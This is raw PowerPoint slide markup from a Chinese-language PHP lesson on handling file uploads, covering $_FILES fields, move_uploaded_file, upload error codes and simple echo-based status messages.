            <a:ext cx="86394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600" dirty="0"/>
              <a:t>在瀏覽者選擇好要上傳的檔案並按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>後，檔案就會被上傳至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>伺服器的暫存資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>，    暫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>存檔的名稱為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>phpxxx.tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>為流水號。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600" dirty="0" smtClean="0"/>
              <a:t>後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>端的處理程式可以透過下列變數取得上傳檔案的資訊：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1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[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1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欄位名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1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”][“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1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”]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1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600" dirty="0" smtClean="0"/>
              <a:t>======</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>傳檔案後的暫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>存檔之資料夾位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="16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move_uploaded_file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函式將暫存檔案移至特定的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資料夾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23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238897"/>
            <a:ext cx="9144001" cy="560174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http://php.net/manual/en/function.move-uploaded-file.php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01" y="858488"/>
            <a:ext cx="8766997" cy="5781209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="2684" t="79943" r="44672" b="12729"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="188501" y="4563762"/>
            <a:ext cx="8850010" cy="667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迴轉箭號 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4827374" y="3978875"/>
            <a:ext cx="2603156" cy="757881"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27174"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 35869"/>
              <a:gd name="adj4" fmla="val 43750"/>
              <a:gd name="adj5" fmla="val 7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3424" t="39148" r="28108" b="31912"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="133829" y="1635210"/>
            <a:ext cx="8959353" cy="2051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61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42873" y="-57150"/>
            <a:ext cx="92868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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Upload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8454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7135" y="3863860"/>
            <a:ext cx="8740345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echo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"&lt;strong&gt;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檔案上傳成功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&lt;/strong&gt;&lt;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&gt;";	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>顯示檔案資訊		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echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案名稱：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"]["name"] . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>暫存檔名：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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"] . "&lt;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檔案大小：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"]["size"] . "Bytes&lt;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檔案類型：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"]["type"] . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt;";						</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "&lt;p&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>JavaScript:history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>繼續上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;&lt;/p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;";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" y="295666"/>
            <a:ext cx="6798350" cy="35681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63078" y="1765566"/>
            <a:ext cx="4724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The HTML Strong Importance Element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(&lt;strong&gt;) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>indicates that its contents have strong importance, seriousness, or urgency. Browsers typically render the contents in bold type.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292884" y="3522599"/>
            <a:ext cx="3694595" cy="1169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/>
              <a:t>The &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>&gt; tag defines a thematic break in an HTML page (e.g. a shift of topic).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>The &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>&gt; element is used to separate content (or define a change) in an HTML page.</a:t>
            </a:r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140043" y="1853514"/>
            <a:ext cx="4123035" cy="47779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96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7135" y="3863860"/>
            <a:ext cx="8740345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altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"&lt;strong&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案上傳成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/strong&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt;";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altLang="zh-TW" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>顯示檔案資訊		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echo "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檔案名稱：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. $_FILES["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"]["name"] . "&lt;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&gt;";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echo "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暫存檔名：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. $_FILES["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"]["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tmp_name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"] . "&lt;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&gt;";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echo "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檔案大小：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. $_FILES["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"]["size"] . "Bytes&lt;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&gt;";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echo "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檔案類型：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. $_FILES["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"]["type"] . "&lt;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&gt;";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>						</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "&lt;p&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>JavaScript:history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>繼續上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;&lt;/p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;";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" y="295666"/>
            <a:ext cx="6798350" cy="35681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58479" y="3214126"/>
            <a:ext cx="631056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$_FILES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"]["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name"]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：上傳檔案的原始名稱。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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dirty="0" smtClean="0"/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>type"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：上傳的檔案類型。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>size"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：上傳的檔案原始大小。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：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上傳檔案後的暫存資料夾位置。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>["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dirty="0" smtClean="0"/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>error"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>如果檔案上傳有錯誤，可以顯示錯誤代碼。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2658479" y="111000"/>
            <a:ext cx="61332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後端的處理程式可以透過下列變數取得上傳檔案的資訊：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8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7135" y="3863860"/>
            <a:ext cx="8740345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 smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"&lt;strong&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案上傳成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/strong&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt;";	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>顯示檔案資訊		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案名稱：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"]["name"] . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>暫存檔名：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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"] . "&lt;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檔案大小：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"]["size"] . "Bytes&lt;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      echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案類型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" . $_FILES["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>myfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"]["type"] . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt;";						</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "&lt;p&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>JavaScript:history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>繼續上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;&lt;/p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;";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" y="212974"/>
            <a:ext cx="6798350" cy="35681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23750" y="3153186"/>
            <a:ext cx="63637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echo "&lt;p&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=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JavaScript:history.back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()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>繼續上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;&lt;/p&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直線單箭頭接點 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1524000" y="3337852"/>
            <a:ext cx="1099750" cy="6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5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29242"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="369168" y="588672"/>
            <a:ext cx="7971172" cy="29700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68312" y="3031525"/>
            <a:ext cx="2822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無法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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68312" y="2194523"/>
            <a:ext cx="670498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 echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案上傳失敗 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(" .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$_FILES["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myfile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"]["error"] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. ")&lt;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echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>javascript:history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>重新上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;";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2334"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="369168" y="3749417"/>
          <a:ext cx="840413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497"/>
                <a:gridCol w="7191633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錯誤代碼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沒有錯誤發生，檔</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>案</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>上傳成功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mtClean="0"/>
                        <a:t>上傳的文件超過了 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
                        <a:t>php.ini </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>中 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" err="1" smtClean="0"/>
                        <a:t>upload_max_filesize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
                        <a:t>選項限制的值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上傳文件的大小超過了 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HTML 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表單中 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MAX_FILE_SIZE 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選項指定的值。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檔</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>案</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>只有部分被上傳。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沒有</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>檔</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>案</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>被上傳。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找不到暫存檔案夾。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
                        <a:t>PHP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                        <a:t>4.3.10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>和 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                        <a:t>PHP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
                        <a:t>5.0.3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
                        <a:t>引進。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檔</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>案</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>寫入失敗。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                        <a:t>PHP 5.1.0 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>引進。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10742" y="3374080"/>
            <a:ext cx="578755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http://php.net/manual/en/features.file-upload.errors.php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225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7896" y="393549"/>
            <a:ext cx="2321750" cy="32635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59646" y="1426871"/>
            <a:ext cx="29105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PART 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　應用實例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>章　行動商品型錄</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>章　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>地圖應用網站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　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　檔案上傳</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>章 留言板與討論群組</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>章　線上寄信服務</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>　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　會員管理系統</a:t>
            </a:r>
          </a:p>
